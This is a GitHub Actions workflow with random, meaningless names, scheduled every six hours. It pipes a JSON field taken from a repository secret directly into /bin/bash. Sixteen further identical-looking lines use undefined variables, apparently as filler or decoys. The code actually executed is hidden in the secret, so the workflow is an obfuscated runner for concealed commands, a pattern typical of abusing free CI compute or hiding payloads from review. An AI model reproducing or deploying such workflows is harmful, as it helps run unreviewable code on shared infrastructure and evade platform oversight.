name: kexiagjiaohe
on:
  workflow_dispatch:
  schedule:
    - cron: '45 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kexiagjiaohe
        env:
          gdij14: ${{ secrets.gdij14 }}
        run: |
          echo $gdij14 | jq -r .sbeli08405 | /bin/bash
          echo $y9 | jq -r .quhvm94 | /bin/bash
          echo $dwlu344 | jq -r .t76222 | /bin/bash
          echo $xugjw3 | jq -r .dnfiz03 | /bin/bash
          echo $xsvw0440 | jq -r .bq59 | /bin/bash
          echo $jsbbk9 | jq -r .nfg99326 | /bin/bash
          echo $r62 | jq -r .toqzy4 | /bin/bash
          echo $cv5 | jq -r .d61 | /bin/bash
          echo $lqm94400 | jq -r .nmnxj6 | /bin/bash
          echo $q2251 | jq -r .ncvhw11152 | /bin/bash
          echo $v82886 | jq -r .zte3 | /bin/bash
          echo $uwub33420 | jq -r .vfui802 | /bin/bash
          echo $kho618 | jq -r .p16 | /bin/bash
          echo $o412 | jq -r .ixy6 | /bin/bash
          echo $cp3462 | jq -r .atbsw797 | /bin/bash
          echo $gebrz28 | jq -r .wdpnd0352 | /bin/bash
          echo $g03700 | jq -r .ov61 | /bin/bash

